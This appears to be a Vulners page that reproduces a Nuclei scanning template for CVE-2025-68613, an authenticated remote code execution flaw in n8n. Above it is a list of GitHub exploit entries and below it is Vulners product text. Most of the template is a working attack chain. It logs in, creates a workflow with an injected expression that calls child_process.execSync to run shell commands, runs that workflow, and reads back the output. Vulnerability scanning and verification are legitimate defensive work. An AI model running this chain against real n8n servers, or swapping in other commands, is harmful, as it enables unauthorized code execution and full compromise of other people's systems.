| Reporter | Title | Published | Views | Family All 74 |
|---|---|---|---|---|
| Exploit for CVE-2025-68613 | 25 Dec 202520:01 | – | githubexploit | |
| Exploit for CVE-2025-68613 | 26 Dec 202519:40 | – | githubexploit | |
| Exploit for Improper Input Validation in N8N | 20 Jan 202611:50 | – | githubexploit | |
| Exploit for CVE-2025-68613 | 24 Dec 202513:07 | – | githubexploit | |
| Exploit for CVE-2025-68613 | 26 Dec 202515:40 | – | githubexploit | |
| Exploit for CVE-2025-68613 | 22 Dec 202506:45 | – | githubexploit | |
| Exploit for Improper Control of Dynamically-Managed Code Resources in N8N | 22 Dec 202518:41 | – | githubexploit | |
| Exploit for Improper Input Validation in N8N | 30 Jan 202622:38 | – | githubexploit | |
| Exploit for Improper Input Validation in N8N | 9 Apr 202611:09 | – | githubexploit | |
| Exploit for CVE-2025-68613 | 24 Dec 202517:38 | – | githubexploit |
id: CVE-2025-68613
info:
name: n8n - Remote Code Execution via Expression Injection
author: rxerium,PentesterFlow,MuhamadJuwandi
severity: critical
description: |
n8n < 1.120.4, 1.121.1, 1.122.0 contains a remote code execution caused by insufficient isolation in workflow expression evaluation, letting authenticated attackers execute arbitrary code with n8n process privileges. Exploit requires authentication.
impact: |
Authenticated attackers can execute arbitrary code with n8n process privileges, potentially leading to full system compromise.
remediation: |
Upgrade to versions 1.120.4, 1.121.1, or 1.122.0 or later.
reference:
- https://github.com/n8n-io/n8n/security/advisories/GHSA-v98v-ff95-f3cp
- https://nvd.nist.gov/vuln/detail/CVE-2025-68613
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.9
cve-id: CVE-2025-68613
epss-score: 0.97875
epss-percentile: 0.99899
cwe-id: CWE-94
metadata:
vendor: n8n
product: n8n
verified: true
max-request: 7
shodan-query: http.favicon.hash:-831756631
tags: cve,cve2025,n8n,authenticated,rce,intrusive,vkev,kev
variables:
randstr: "{{rand_base(8)}}"
n8n_email: "{{n8n_email}}"
n8n_password: "{{n8n_password}}"
flow: |
http("version-check");
let email = template["n8n_email"];
let password = template["n8n_password"];
if (email && password && email.length > 0 && password.length > 0) {
http("login") && http("create-workflow") && http("run-workflow") && http("get-results") && http("delete-workflow");
}
http:
- id: version-check
raw:
- |
GET /signin HTTP/1.1
Host: {{Hostname}}
Accept: */*
extractors:
- type: regex
name: base64_content
group: 1
regex:
- '<meta name="n8n:config:sentry" content="([A-Za-z0-9+/=]+)"'
internal: true
- type: dsl
name: version
dsl:
- 'replace_regex(base64_decode(base64_content), ".*n8n@([0-9]+\\.[0-9]+\\.[0-9]+).*", "$1")'
internal: true
- type: dsl
dsl:
- '"n8n Version: " + version'
matchers:
- type: dsl
name: version_check
dsl:
- '(compare_versions(version, ">= 0.211.0") && compare_versions(version, "< 1.120.4")) || (compare_versions(version, ">= 1.121.0") && compare_versions(version, "< 1.121.1"))'
- 'contains(body, "<title>n8n.io")'
condition: and
- id: login
raw:
- |
POST /rest/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"emailOrLdapLoginId":"{{n8n_email}}","password":"{{n8n_password}}"}
matchers:
- type: status
status:
- 200
internal: true
- id: create-workflow
raw:
- |
POST /rest/workflows HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"name":"rce-test-{{randstr}}","active":false,"nodes":[{"parameters":{},"name":"Manual Trigger","type":"n8n-nodes-base.manualTrigger","typeVersion":1,"position":[250,300],"id":"trigger-{{randstr}}"},{"parameters":{"values":{"string":[{"name":"rce_result","value":"={{ (function() { var require = this.process.mainModule.require; var execSync = require('child_process').execSync; return execSync('whoami && id && uname -a').toString(); })() }}"}]}},"name":"RCE Test","type":"n8n-nodes-base.set","typeVersion":2,"position":[450,300],"id":"set-{{randstr}}"}],"connections":{"Manual Trigger":{"main":[[{"node":"RCE Test","type":"main","index":0}]]}},"settings":{}}
extractors:
- type: regex
name: workflow_id
part: body
internal: true
regex:
- '"createdAt":"[^"]+","id":"([a-zA-Z0-9]+)"'
group: 1
matchers:
- type: status
status:
- 200
internal: true
- id: run-workflow
raw:
- |
POST /rest/workflows/{{workflow_id}}/run HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"workflowData":{"id":"{{workflow_id}}","name":"rce-test-{{randstr}}","active":false,"nodes":[{"parameters":{},"name":"Manual Trigger","type":"n8n-nodes-base.manualTrigger","typeVersion":1,"position":[250,300],"id":"trigger-{{randstr}}"},{"parameters":{"values":{"string":[{"name":"rce_result","value":"={{ (function() { var require = this.process.mainModule.require; var execSync = require('child_process').execSync; return execSync('whoami && id && uname -a').toString(); })() }}"}]}},"name":"RCE Test","type":"n8n-nodes-base.set","typeVersion":2,"position":[450,300],"id":"set-{{randstr}}"}],"connections":{"Manual Trigger":{"main":[[{"node":"RCE Test","type":"main","index":0}]]}},"settings":{}}}
extractors:
- type: regex
name: execution_id
part: body
internal: true
regex:
- '"executionId":"([0-9]+)"'
group: 1
matchers:
- type: status
status:
- 200
internal: true
- id: get-results
raw:
- |
GET /rest/executions/{{execution_id}}?{{wait_for(3)}} HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: rce_output
part: body
regex:
- '"([^"]*uid=[0-9]+\([^)]+\)[^"]*)"'
group: 1
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'uid=[0-9]+\([a-zA-Z0-9_-]+\)'
- type: status
status:
- 200
- id: delete-workflow
raw:
- |
POST /rest/workflows/{{workflow_id}}/archive?{{wait_for(2)}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{}
- |
DELETE /rest/workflows/{{workflow_id}}?{{wait_for(2)}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: status
status:
- 200
internal: true
# digest: 4b0a00483046022100f6efe856e69a211b891ff244673d4b45bf6ab97c3ec436e49d782ba03353eff5022100fa7c4ae3ff991aa782cd20f8c4a0fbf4cc6cd81e131ae65d46c929b0f35ff5f2:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation